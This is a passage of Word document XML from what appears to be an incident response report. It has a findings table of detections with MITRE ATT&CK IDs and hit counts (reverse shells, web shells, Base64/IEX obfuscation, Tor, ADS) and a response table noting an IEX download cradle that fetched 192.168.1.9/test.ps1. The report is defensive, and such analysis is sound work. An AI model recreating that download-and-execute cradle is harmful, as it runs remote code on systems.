          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53194263" w14:textId="54170523" w:rsidR="00BA2BC0" w:rsidRDefault="000E505A" w:rsidP="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A485A98" wp14:editId="6DBAD6A7">
            <wp:extent cx="6248400" cy="3314065"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="678536490" name="صورة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1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B90C76" wp14:editId="21810573">
            <wp:extent cx="6248400" cy="1630045"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="502117856" name="صورة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1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B14BA37" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Key Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8208" w:type="dxa"/>
        <w:tblInd w:w="816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52"/>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="864"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="73AFAD39" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4A2070"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35389930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w="4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4A2070"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57598BAC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w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4A2070"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21501908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MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4A2070"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18DD0FB1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Hits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="22889EAD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35955F31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w="4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E719B77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Reverse shell command detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2765F4B5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T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D697A61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96</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="2F9AF747" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E3C189A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w="4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1288D046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Web shell detected on server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25AAB884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T1505.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21756471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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="67A3B0DD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="670D296B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w="4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EFAEAC6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Exploit kit activity detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B0DA643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T1203</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55B04DC0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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="22EDCA7D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DC500A1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4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59B5DB02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Command obfuscation (Base64/IEX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="309FB03F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T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79393687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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="5D7A8A7F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="177DD130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4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50CEE59E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Tor network usage detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C4BCDAB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T1090.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="731DE8D8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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1FA524CA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="412016DC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4320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0719BEE8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Alternate Data Stream (ADS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01BD7A9D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T1564.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D8C0F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0A0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D159294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8"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E9DE8C5" w14:textId="77777777" w:rsidR="000E505A" w:rsidRDefault="000E505A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7582C4A1" w14:textId="77777777" w:rsidR="000E505A" w:rsidRDefault="000E505A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF02AE0" w14:textId="2AF78A56" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Incident Response Actions</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="0D9D23B5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BA9DBF8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7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E689806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BA2BC0" w14:paraId="437875B1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="606F7E3D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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alert Triage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="304ADFCD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Identified IEX download cradle targeting 192.168.1.9/test.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3D5270AC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F47E64E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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IOC Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="045B4AD5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16 IOCs extracted including malicious URL and suspicious domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="2D922C15" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EB93F2B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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>STIX Export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43B90F71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Threat intel bundle generated for sharing with threat intel platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4DD86C45" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BB1E6C9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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
